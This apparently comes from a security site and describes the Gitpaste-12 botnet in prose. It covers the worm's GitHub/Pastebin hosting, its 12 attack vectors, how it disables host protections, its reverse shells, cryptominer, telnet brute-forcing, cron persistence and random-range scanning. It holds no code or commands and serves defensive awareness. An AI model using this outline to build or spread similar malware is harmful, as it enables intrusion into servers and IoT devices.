Gitpaste-12 Botnet Description
Gitpaste-12 is a botnet and an extremely sophisticated worm threat that has been equipped with a wide range of threatening capabilities. The name Gitpaste-12 was derived from the fact that certain components of the threat were hosted on legitimate services such as GitHub and Pastebin. The number 12 denotes the 12 different attack vectors exploited by the worm - 11 vulnerabilities and a telnet brute-force function. Two of the vulnerabilities target Apache Struts and MongoDB, two widely-used open-source components. The malware is designed to infect Linux-based x86 servers and Linux ARM and MIPS-based Internet of Things (IoT) devices.
The fact that the main payload of Gitpaste-12 Botnet was hosted on genuine sites like GitHub and Pastebin, makes it that much harder to block the malware's Command-and-Control (C2, C&C) infrastructure within the compromised network. It should be noted that Gitpaste-12 was present on Github for several months starting back in July 2020 but was removed after being discovered by the researchers at Juniper Threat Labs. While this stops the propagation of the botnet effectively, the hackers can establish their C2 infrastructure elsewhere, a possibility that is quite likely due to Gitpaste-12 being under active development, as evidenced by several factors.
Once inside the targeted device, Gitpaste-12 terminates multiple layers of protective anti-malware measures. It deactivates firewall rules, apparmor, selinux, etc. It then allows the hackers to execute reverse shell commands using TCP ports 30004 and 30005, as observed on some of the infected systems. Gitpaste-12 has different modules responsible for dropping a Monero cryptocurrency miner on the compromised devices, executing a Telnet-based script for brute-force attacks against Linux servers and IoT devices, a persistence mechanism through cronjob, etc. The worm can propagate itself and infect other machines by choosing a random /8 CIDR and trying all addresses within that range.